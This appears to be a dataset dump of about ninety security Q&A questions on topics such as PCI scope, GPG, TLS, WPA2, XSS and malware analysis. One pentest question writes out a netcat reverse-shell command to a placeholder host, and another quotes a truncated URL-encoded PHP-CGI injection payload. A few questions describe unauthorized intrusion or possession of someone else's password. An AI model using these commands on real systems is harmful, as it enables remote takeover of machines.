instruction stringlengths 24 29.9k |
|---|
As I know facebook chat is working like user <> server <> user and it's not P2P. I was talking with some guys today and they were pretty sure it's possible to netstat a facebook user IP address. I'm not familiar how FB chat works, but I highly doubt they're using P2P in their chat. So my question is it possible to nets... |
Say we have an InnoSetup installer script, a native C++ QT files loading application and a .Net client application that we load/update each time and which is the main application. We load files via http post\get requests.
So how many different certificates would our application need to prove for antivirus protectors th... |
I am being attacked with this cgi injection:
POST
//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%... |
On some accounts I use my real name on-line (Google+/Facebook/Wikipedia/personal blog), others (Q&A/Gaming) I use an alias.
My question is: Security and privacy wise, what can people do with my real name? What are the dangers of using your real name on-line.
|
Say I have an application that takes credit cards, but this is actually a payment gateway on the internet that I don't control.
The web site used HTTPS and only returns if the card was authorized or not and stores the last 4 digits of the PAN.
With this setup, how much, if any, of the infrastructure is really in-scop... |
I'm late to the party and need to be caught up. I'm doing my homework looking things up.
I know that I don't want unsalted challenge-response CRAM, I want salted challenge-response SCRAM.
I think ASP.NET MVC sends cleartext passwords over the wire from what I can tell, and relies on https for security. WebSecurity.Log... |
I recently saw a question in which someone implied that tunneling could foil MITM even if it were implemented while an MITM was taking place. My understanding of tunneling is that it is only capable of stopping MITM if it connects to the actual network before the attack is attempted, otherwise the VPN would be set up b... |
I would like to run some program, preferably in a sandbox, and see exactly what it does/did. I'm currently puzzled by disk access and network, since there's so much other stuff happening there at the same time.
I'm mostly curious about Windows, but also Mac, Linux and Android. Are there any good tools to sandbox/analyz... |
As I'm encrypting server backups, I typically install my public GPG key from a keyserver into me server's keyring:
gpg --search-keys 6569758F
I import the key into my keyring.
I then attempt to encrypt a file:
gpg --encrypt --recipient 6569758F myfile.log
I'm now presented with something like this:
gpg: EE928AAF: The... |
I read another question which made me think...
If you encrypt PCI data (credit card numbers, etc.) using PGP or AES and send it through a firewall, is that firewall in scope?
Alternatively, what if you only use a data-in-motion security mechanism like SSH or TLS, would that same firewall be in or out of scope?
Perha... |
PGP public keys look something like
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.9 (GNU/Linux)
mQGiBEl2HAgRBAC9IZGQE3NRWFoXV7CcVRbo7xMe+nGPRMTOocA0pcv9N67R6CAZ
...
-----END PGP PUBLIC KEY BLOCK-----
I'm wondering why the 'Version:' line is always included and if it's safe to remove. Why advertize what ver... |
I've used wireshark to watch serveral SSL3.0 traffic and decrypt the messages transfered between client & server.
And what I've just found is very strange :
AFAIK, the encryption-key, MAC and encryption algorithm used in calculating client-Finished and application-data sent by client are exactly the same.
But, when I u... |
when was the possibilty to perform man in the middle attack on ssl? is it possible to perform with out session between client and server? can you explain MITM?
|
I'm running a pentest and im expecting reverse shells from multiple shells connecting back as :-
nc <my-ip> <my-port> -e /bin/bash
However, I'm trying to figure out the best way to manage these incoming connections. Are there any suggestions on best practices related to this? I had a look at metasploits meterpreter sh... |
This is what the authors of the book "Digital Forensics with Open Source Tools" say about the term evidence:
The examiner reveals the truth of an event by discovering and exposing the remnants of the event that have been left on the system. In keeping with digital archaeologist metaphor, these remnants are known as ar... |
With so many identities stolen last ten years, we know a bunch of emails and a bunch of passwords.
Are the two following databases legal under the US federal laws?
Publish a database which victim's identity is paired up with victim's known passwords
Publish a database which has a table of email addresses and another t... |
When I was implementing my webapp, I decided to hash and salt users' passwords in order to protect them, even though I knew that there will never be a lot of them ... if any. Of course, I'm not saying that my implementation is perfect and will stand on the face of potential attackers, but at least I tried.
I thought th... |
I often see malicious keyloggers being advertised as having anit-wireshark feature. Meaning their data can't be sniffed. Is it possible to do so? How would they do it?
My guess is that they just check if Wireshark is running and don't send logs if Wireshark is running. So, this wouldn't work if you are capturing packet... |
I have an Amazon EC2 instance in a VPC.
I have not logged into it for some time, so I used the Amazon EC2 CLI with ec2-get-console-output to check what the thumbprint should be when I connect. To my surprise, the thumbprint on the certificate, in the remote desktop warning screen, was wrong.
I have connected to it via... |
I know that TLS protocol is used to authenticate two persons and when a secure channel is established we can perform a key exchange.
My question is if TLS can be used to establish a secure channel between more than two persons. If yes how?
|
I'm not a hacker but recently I was able to get someone's email password. I want to teach him a lesson to be careful when using internet and to pay attention to his passwords but I have some problems:
I don't know him and can't contact him face-to-face.
He doesn't check his emails( there are tons of unread messages ) ... |
Alice goes to the certificate authority (CA) and registers her public key for signature verification. She gets a certificate for this from the CA. Bob requests Alice' public signature verification key from CA. CA returns Alice' key, certified by CA's signature.
Now imagine CA sends a fake public key to Bob which not be... |
We need to generate tamper-resistant URLs to access a service, which are then shared with the end-user. The URLs don't contain any confidential data, but we need to ensure that they have not been tampered with since they were generated. It's up to the end-user to keep these confidential.
It seems like a MAC (like HMACS... |
Looking at a handful of websites that allow for/require HTTPS, I realized that the certificate for a few of them specifically identifies the owning corporation, but some (most) don't.
What's the difference between a certificate that identifies a corporation and one that doesn't? Shouldn't they pretty much all identify... |
Recently, I've been reading about DNSSEC and how it works. I found other questions and some very interesting answers on this and other websites related to this matter.
However, I have a question to which I couldn't find an answer anywhere: how can a client know that a DNS zone is supposed to be signed? If machineA neve... |
Given the alleged possibility that an adversary might attempt to acquire my (OFFLINE) Secret Certification Key and Passphrase and sign other keys with it, including a key they made with my User-Identity metadata to pretend to be me:
Does GPG have a command that asks keyservers to search for and list every key signed by... |
I'm currently using WPA2-PSK with CCMP on my home WiFi network for encryption and security.
I was a big fan of MAC filtering, until I realized that MAC addresses are publicly sniffable in the 802.11 packets.
Is WPA2-PSK with CCMP "good enough" for WiFi security in light of programs like oclHashcat, which can bruteforce... |
I'm going to recommend that our users start using a password manager and start creating strong random passwords.
Though I don't know what size of a password to recommend. Is it possible for a password to be so strong that it stops making sense?
I want them to have passwords that are strong, random, and long enough so t... |
CAcert and StartSSL both only validate domains whose TLD is owned by the requester. I have a few subdomains that come from places like freeDNS that I would like to run an SSL-secured server on. Are there any CAs that offer this service for free, and, if so, what are the possible security flaws created there? It seems t... |
As far as I can tell based on the reading I've done so far, WPA2-Enterprise uses the same encryption and security algorithms and methods as WPA2-PSK, with the addition of using another service for authentication.
Is this accurate, meaning that a WPA2 Enterprise WiFi network is just as susceptible as a WPA2 PSK network... |
According to http://en.wikipedia.org/wiki/Digital_cinema under How Digital Cinema Works it states that the decryption keys are time-limited and expire after the end of the booked time. From a high level perspective, how does this work? Is timestamp information retrieved from a trusted source over the wire or does the p... |
Can anyone explain me the Step by step process of Key Exchange that takes place while accessing Linux machine using Putty ? I found the Event Log of Putty but the Various Key Exchange didn't make very sense to me. I am still a beginner in security field. So,anyone please help remove my doubt ?
|
My wife's computer was recently compromised and I have tried to clean it.
I installed Microsoft Network Monitor to see if there was any unexplained internet traffic and I noticed a connection to Dropbox. Here is the given details:
URI: /subscribe?host_int=34404476&ns_map=162130732_8752065324,26351085_36339744642541,129... |
What is the best way to verify if an MSRDP server has NLA enabled or not?
My understand is that if enabled, it will not show a graphical screen when trying to connect, but ask for credentials first.
Would one way to verify this be to use the rdesktop utility and if a GUI screen is shown for login, note that NLA is not... |
I am aware that there is the CVE list published by the NVD. Are there any other important vulnerabilities lists that show vulnerabilities other than the NVDs?
Thx
|
It seems to me that to maximise server security, one ought - in addition to the usual security measures implemented in software - to prevent the overwriting of certain parts of the server system, such that only physical access will circumvent this write-protection.
Rationale
If a remote attacker who has been successful... |
I have just discovered that I can login to my bank with passwords that is not mine.
Example:
My password is "1234" but I am authorized with all possible post characters. For example "12345" or "12341234" will authorize me.
Also note that my password was assigned to me by the bank (four digits) and the login is a norm... |
Background: I'm considering switching from shared web hosting to VPS for added security. However - managed VPS's costs much more than unmanaged ones. So, assuming:
I secured my website against any type of sql injection and the like.
I Keep my password secure .
I set Windows update to automatic.
The web hosts themselv... |
I am building a web service that has to be only accessible for iOS apps.
In the future I want to expand to a mobile web-site to make my service also available for other mobile operating systems.
Now, I have everything working through an API. my users can register, search companies, order products from those companies,... |
Is anyone familiar with a way in which I can post a link on my website, that when accessed will cause users to issue an HTTP request to a 3rd party site with custom content in the HOST header (different from the actual host/domain to which the request is sent to on the IP level)? A short example to clarify my intention... |
Is there any way an encrypted file using AES-256 could be modified without alerting the file owner, ie., so it can still be decrypted with the same key?
I know that without an initialization vector blocks in a cipher-text can be deleted, moved, duplicated etc. (am I right?) without detection. Using an initialization v... |
Questions
Can one implement a secure voting system having all the features described below?
e.g. without disclosing any individual's vote to the government server (or the third party), preserving all the desired criteria of a ZKP vote, etc.
Are there any other security issues to consider in this kind of system, and... |
I'd like to know if the latest generation of Android devices provide an application with access to their Secure Element in some way (other than by way of the NFC interface, which is #1 application of the SE), preferably by implementing a keystore that uses the service of their Secure Element?
My use case is storing and... |
A web shop allows orders from guests. When checking out, the guest has to provide an email address (in addition to shipping address and payment data). When this email address is already in use by a registered shop user, the guest order shall be associated with this user account.
Would it be secure to associate the gues... |
One of the things that came out of the Snowden files, I believe, was that ISP's will monitor someone that has a BitTorrent client (uTorrent, qbittorrent etc.) installed on their PC, even if they don't use it. It is possible to hide BitTorrent traffic using a VPN, but, hypothetically, how does one hide the very existenc... |
I'm reading the specification for a commercial product which provides a webservice.The spec goes like this:
The client (a webbrowser) may use https
Client asks server for info --> gives modulus and exponent of his public RSA key
Client asks server for a session --> client creates a random cipher, encrypts with server ... |
Some time ago, I hacked into my school's internet integrated system, and I had the entire database(users, passwords, photos and whatsoever) and source code of it. At some point, I disclosed the password of the admin, and because of it, some random person put random cows in the site and I got caught by social engeneerin... |
If I want to send emails to friends who use Google, Yahoo, AOL, etc., how can I currently use my local email client to send a metadata-free* email to them?
E.g., is it possible to bypass my own mail provider and directly contact my friend's mail server with an encrypted mail with only one identifying header, TO: friend... |
I have a network that has a single point of entry the WAN. The WAN exposes about 10 static IP's that resolve internally to servers that are in the same subnet. Meaning that if you RDP over 3389 to SQLPrimary1 from it you can RDP to all the other devices on the network. Each server has it's firewall disabled. There is n... |
I have bought new WILDCARD certificates (*.mydomain.com) for my servers.
I was able to install successfully on one server. So, I know the files are correct and I was able to verify their validity.
My servers are running Apache2 on Ubuntu 10 and 12-
I have stored away the old certificates and install the new ones in a ... |
I understand executing something like a reverse TCP bind via shell relies on resources being available on the victim machine... and in the case of running a, shall we say, Ruby script from the command line it will be interpreted down to machine code and executed...
My question is, when you drop machine code directly in... |
G-Free: defeating return-oriented programming through gadget-less binaries
This paper describes what seems like a really cool technique to prevent ROP attacks if the source is availible. They use an assembly preprocessor getween gcc and the assembler to remove or protect all possible free branches (returns and indirect... |
For some reason I had been using public network for a small time, and I suspect that someone was actually watching/recording my online/offline activities.
At some time I suspected that someone was accessing my system (like cursor and other controls behaving weird as if someone else was controlling them, screen slightly... |
I've been offered a free Secure Shell at a friends server. However, I was wondering if it might be insecure to join this server from my personal computer at home - may my computer pose any security risks open for attacks from him whilst being connected to his server?
Note that this friend and I barely know each other, ... |
I'm designing a homework challenge for students who are learning about memory safety and writing secure C code. As part of this, I am looking for a small programming task where it's non-trivial to write C code that is free of buffer overruns, array out-of-bounds errors, and/or other memory safety errors. What would b... |
I am trying to understand some techniques regarding SYN flood prevention and there are three terms I couldn't find a clear explanation of.
The terms that are confusing me are:
SYN Proxy
SYN Cache
SYN Cooke
What do these mean and what is the different between them?
|
CRIME mitigation involves disabling TLS compression. My server offers services only via XML-RPC and does not make use of Cookies, which is what CRIME exploits. Does this mean that I can turn on TLS compression without worrying about being compromised? We use basic access authentication which seems like it would be equa... |
I am trying to connect to a SSL web server. We currently have a pkcs12 file and connect, that is our private-key and certificate. Is it possible to connect using Java code with a public-key and certificate. Imagine I have a file (it is digital but here is the pem output).
> Myfile.pk12 / Myfile.pem
>
> -----BEGIN ... |
I was wondering what ways there are to MiTM a client link to the server where I would give them a public key that they would then send their data via https://example.com using my key.
Then without their knowledge I decode it on my machine, reencode with the real keys that my machine got from the server and pass it on c... |
I was curious recently when I heard that SSL had supposedly been broken by a certain rogue government agency, why SSL was chosen in the first place. Could it be that PGP would have been a more secure method to encrypt traffic? Today we also have GPG which is free and open. I believe PGP now offers an authentication hie... |
I must spoof my identity for some reason.
Are Technitium Mac Address Changer App on windows and VPN is a trusted way to be anonymous?
|
I do not have experience with web development, but I have read that ActiveX should be abandoned because it is insecure, in favour of other scripting methods such as JavaScript.
What exactly does ActiveX do, why is it considered insecure and how is it different from JavaScript and VBScript?
I would prefer a simple expla... |
I've setup an PPTP VPN server on my Debian 7 server. I'm using this VPN in combination with my Android phone to ensure a secure connection.
However, i'm getting curious of what my phone is sending and receiving, especially from Google. Is there a way to setup an HTTP(S) sniffer in my VPN server. I have some basic knowl... |
I'm doing a pentesting example on a web app and I have dumped all the database.
I have a table with the users in plaintext and the passwords hashed.
I have to find the admin's password (I know that it's possible because that is the example's final goal). But admin's password is hashed and cannot be reverse with any loo... |
I learned that perfect forward secrecy is implemented through DHE and ECDH but what is the difference between these 2 key exchanges?
Also can someone explain how perfect forward secrecy works? I've found a variety of answers online ranging from: there's a secret session key that's never shared that's generated, there'... |
I'm pentesting a website that has a reflected XSS, or at least a vector for a reflection, but the issue is the following :
It escapes <, >, " to their HTML entities, but not &, ) or (.
You are not in a tag, so you have to create your own.
It's not the first time that I see implementations of this sort. Express.js has... |
OpenSSH just introduced a new protocol, chacha20-poly1305@openssh.com, which combines the two algorithms from DJB: ChaCha20 and Poly1305-AES. It was inspired by a similar proposal for TLS, which seems to have actively been backed by Google in the recent months.
But most SSH installations are inherently different from ... |
I have recently been introduced to OpenVAS for scanning our network at work. I am familiar with nmap, and I am happy with it's performance when used stand-alone from the cli, through iptraf I can see it is scanning at speeds upwards of a thousand packets a second, however when scanning through OpenVAS I can't seem to b... |
I tested web site application with commercial automated tool.There are some blind sql injection.I want to retest this results .Is there any good method for test blind sql injection with tool or anything else ?
|
I receive a lot of requests like this:
ip-10-80-XXX-XXX.eu-west-1.compute.internal:80 110.249.208.XXX - - [11/Dec/2013:10:27:17 +0000]
"GET http://mn.sina.com.cn/news/xianchang/2012-06-07/212535.html HTTP/1.1" 200 9515
"http://mn.sina.com.cn/news/xianchang/list.html" "Mozilla/5.0 (w3660t by Kev++)"
I don't understan... |
I understand that the TPM can be used to store an unlimited number of keys. However I am left with a few questions:
Presuming the TPM is connected on the LPC what protects the data travelling across that interface.
If I follow the SRK key approach what is used as the root key, i.e. is the SRK key hard code inside the... |
I am trying to get my machines to be force through a MiTM and the MiTM to redirect them to a server of my choice (which happens to be the MiTM on port 17002)
I am running ip tables:
sudo iptables -t nat -A PREROUTING -s 192.168.0.0/24 -p tcp --dport 80 -j DNAT --to-destination 192.168.0.2:17002
I am then using ettercap... |
Does QuickVPN create a secure tunnel or how does it work to provide encryption and security?
When I did a see my IP it was using the remote locations IP and not my office network's IP so does that mean there is no tunnel? Is it safe?
|
When i turned on my pc at the office this morning i found a file (text document) on my desktop saying that my secret santa salutes me and gave me a clue for where to find my gift.
The weird thing was, when i opened the file details (using the file properties) i found that i was the owner of that file, 2 seconds later ... |
Trying to follow up this post How to trace a (mobile) phone? , the answers on how to prevent being tracked while you own a mobile phone are: You cant. (even if you use disposable phones etc)
1) Why a similar concept as Tor project wont work in this scenario? (all the nodes /towers are controlled by people/ a company th... |
I was unable to find any good documentation or anything on mXSS. Can anyone give some info or give a link?
I found a video and a PDF of the video's presentation:
http://www.youtube.com/watch?v=Haum9UpIQzU
https://hackinparis.com/data/slides/2013/slidesmarioheiderich.pdf
|
The introduction of the new top level domains (TLDs) such as .music, .books, etc. will increase the number of people and organisations adding and removing entries into the root DNS servers (.) for their own TLD.
Given the TLDs "me." and "in.", this means they will have different protections in place to create and man... |
I have recently started a project to code a secure password protection algorithm to be used on both computers and mobile devices. As I have never done anything like it before, I am a bit unsure of where to start. This code needs to be extremely secure, but also flexible on the front end. I am familiar with Java, C, and... |
One of the dangers of using WPA2-PSK is the possibility that an attacker may setup another wireless network with the same SSID and even use the same access point MAC address via MAC spoofing. The attacker then may use a deauth attack to cause an internal computer in the network to have to reauthenticate, allowing the a... |
I use Gmail to exchange confidential and important documents with my customers. The documents are read by an unauthorized person (during sending the email) that I don't know him/her. How can I solve the problem?
|
Well lets assume that someone is intending to build a website that will contain THOUSANDS of sensitive records such as credit cards etc.
What would be a good checklist that would ensure that the website has the maximum of the security necessary to operate such a website safely?
|
I encountered an error in a Nessus result.
Error:
No host data is available for this scan.
I want to scan IP 192.16x.x.x with Nessus. I scan this IP with nmap and only 2 TCP ports are open. Essentially, the results say the host is up. I checked my firewall rules. Nothing seems wrong with them.
I also checked t... |
In some (web) applications there is a minimum length for usernames, usually there is a restriction for a minimum of 6 characters length.
For example, free gmail accounts and miiverse (Nintendo social network).
Why is there a minimum username length? And why a minimum of 6 characters?
|
I've noticed when updating a blog, that sometimes refreshing the page won't actually fetch it again, because it is still in the cache. Now, even when I open it in incognito in that same browser(say Chrome), it still uses the same cache, at least for some time. My understanding is that the site can "tell" my computer ho... |
After a penetration test made upon an intranet application I'm developing, in ASP.NET MVC, one of the concerns raised was that the application supports concurrent user sessions and it is recommended that the application is reconfigured to support only one session at a time for any given user account.
Windows Authentica... |
According to http://nginx.org/en/docs/http/ngx_http_auth_basic_module.html nginx can read password hashes of these types:
crypt(), apr1, SHA1 & SSHA.
This is how I understand how these hashes work and what the problem with them is:
crypt() discards everything after the 8th character, so if my password is 12345678UltraS... |
Webcams can be turned on without the indicator light: to prevent unwanted use, I wonder whether there exist applications warning that the webcam is being used, or any other kind of protection.
Since I cannot answer to my question since it gets closed for whatever reason, one possible solution beyond shitting on my web... |
I need to re-work our current security model for desktop computers, and would like some insight as to what changes can be made as well as best practices.
Currently we have the helpdesk role that is published via GPO to add it to the local admins group on computers. For users that require to be local admins, we deny the... |
I don't know much about content injection so I'm hoping to draw on the experience of the community here. I'm writing a tool that evaluates public web proxies. I want to know if the proxies are being used for content injection and other attacks. I.e. to determine if they are injecting malware, phishing attacks, or spam ... |
I have a wordpress website always updated. I'v developed a theme from scratch for it, so my theme is clean as it was always. I use strong passwords generated by specific tools. Last 3 days my website is infected by a code that redirect my website to linkbucks ads. I'v found that this was coming from a code injected int... |
I have noticed that despite having configured Skype to not access video, during startups it continues to access the webcam momentarily. Skype is not a user, so I am unsure how to modify its permissions. Is there any simple way to truly disable it from accessing video?
|
I have a django web app serving restful api endpoints and a javascript web app communicating with those endpoints through ajax.
They are under the same domain but in different ports.
server api ---- www.example.com:9000/api/endpoints
web app ---- www.example.com:9001
Now, we save two types of cookies.
user-session-co... |
Has there ever been a known case where a machine acquired spyware like a browser toolbar, or plugin but that spyware also deployed more dangerous malware like a trojan, botnet, or worm?
|
Have any of you security professionals been able to get security performance metrics into reviews that managers conduct for their employees? If so, are there any helpful resources you could share to make that happen?
|
I made a backup of the old Win 7 Pro then did a clean install. But I forgot to export my EFS encryption certificate, so when after I restored the encrypted files from backup I could no longer access them. Up to here, no surprise.
I then researched and discovered that certs are stored in the C:\Users\username\AppData\Ro... |
Google have decided to show images in Gmail messages accessed via the web, iOS and Android by default:
Instead of serving images directly from their original external host servers, Gmail will now serve all images through Google’s own secure proxy servers.
Also, on this page they explain why they think that this is sa... |
OK - I'm trying to design a system that can provide personalised/differentiated content at minimal expense to the server.
One of the designs I'm currently exploring is where the request is somehow signed using a key/value pair where the value is secret, e.g.:
Original URL: /posts/foo?format=json
Secret pair (known to ... |
Just a small question:
I know it is common for one to use asymmetric encryption in order to encrypt his private key,
when using symmetric encryption.
Is there a name for this process/method of encryption?
|
I notice security companies such as Rapid 7 prevent people signing up with either free email accounts, or accounts provided by ISPs:
https://www.rapid7.com/products/metasploit/metasploit-pro-registration.jsp
To prevent software license abuse, this field requires an email address from a domain you or your employer owns... |
I'm using Thunderbird with Enigmail. It has both encrypt and sign options for sending PGP emails -- but why is an email signature needed? It just looks overkill to me! Alice and Bob can use PGP to exchange a symmetric key then use this key to encrypt emails via AES.
When Eve doesn't know the key, she can't modify ciph... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.